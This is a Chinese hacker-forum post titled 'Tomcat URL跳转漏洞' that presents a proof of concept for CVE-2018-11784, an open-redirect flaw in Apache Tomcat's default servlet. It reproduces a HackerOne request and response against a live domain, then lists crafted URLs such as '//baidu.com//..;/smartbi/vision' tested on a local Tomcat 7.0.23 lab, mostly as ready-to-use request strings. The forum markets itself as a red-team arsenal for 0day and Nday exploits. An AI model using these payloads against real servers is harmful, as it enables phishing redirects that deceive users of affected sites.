黑客仓库

最全面知识的黑客论坛,全网最强大的漏洞数据聚合仓库丨黑客网站丨黑客论坛丨暗网丨红队武器库丨渗透测试丨POC/0day/Nday/1day丨网络安全丨黑客攻击丨服务器安全防御丨渗透测试入门丨网络技术交流丨蓝队丨护网丨红队丨欢迎来到黑客仓库,您可以在我们的论坛板块进行交流和学习。

立即注册账号!
Tomcat URL跳转漏洞

POC Tomcat URL跳转漏洞

Shacker已验证会员

黑客倉庫站長

贡献: 21%
注册
09 10, 2024
消息
186
rce_for_ajp_8009.jpg



JavaScript:
# Tomcat URL跳转漏洞

### 这个漏洞是有CVE的CVE-2018-11784,这是一个任意URL跳转漏洞,具体案例可以参考H1的一个漏洞,https://hackerone.com/reports/387007

- CVE描述:

https://nvd.nist.gov/vuln/detail/CVE-2018-11784

当前当Apache Tomcat版本在9.0.0.M1到9.0.11、8.5.0到8.5.33和7.0.23到7.0.90中的默认servlet返回到一个目录的重定向(例如,当用户请求'/foo'时重定向到'/foo/’)存在安全漏洞,

攻击者构造一个特制的URL可以将请求重定向到攻击者所控制的任意网站上去。

- 根据H1的漏洞,它的POC 即 EXP 也是:【这是真EXP的】
```
构造请求:
https://idp.fr.cloud.gov//blackfan.ru/..;/css

HTTP 响应如下:
HTTP/1.1 302 Found
...
Location: //blackfan.ru/..;/css/
...

打开了https://blackfan.ru/..;/css/ 恶意地址

```

- 本地项目 Tomcat 7.0.23

```
➜  webapps tree -d -L 2
.
├── S2-005
│   ├── META-INF
│   ├── WEB-INF
│   └── example
├── VulDemo
│   ├── META-INF
│   ├── WEB-INF
│   ├── css
│   ├── images
│   ├── js
│   ├── testme.com
│   └── tools
├── fastjson-1.0
│   ├── META-INF
│   └── WEB-INF
└── smartbi
    ├── META-INF
    ├── WEB-INF
    ├── app
    └── vision

20 directories
```
- 实测构造有效POC如下:

```
几个应用的访问URL如下:
http://192.168.0.6:8080/S2-005/example/HelloWorld.action
http://192.168.0.6:8080/fastjson-1.0/
http://192.168.0.6:8080/smartbi/vision/config.jsp
http://192.168.0.6:8080/VulDemo/
http://192.168.0.6:8080/VulDemo/js/login.js

哪么可以构造有效的POC部分如下:
http://192.168.0.6:8080//baidu.com//..;..;/S2-005/example

http://192.168.0.6:8080//baidu.com//..;/smartbi/vision
http://192.168.0.6:8080//baidu.com//..;/smartbi/vision/index.jsp
http://192.168.0.6:8080//baidu.com/..;/VulDemo/js
这些均会跳转到baidu.com站点
```
 
后退
顶部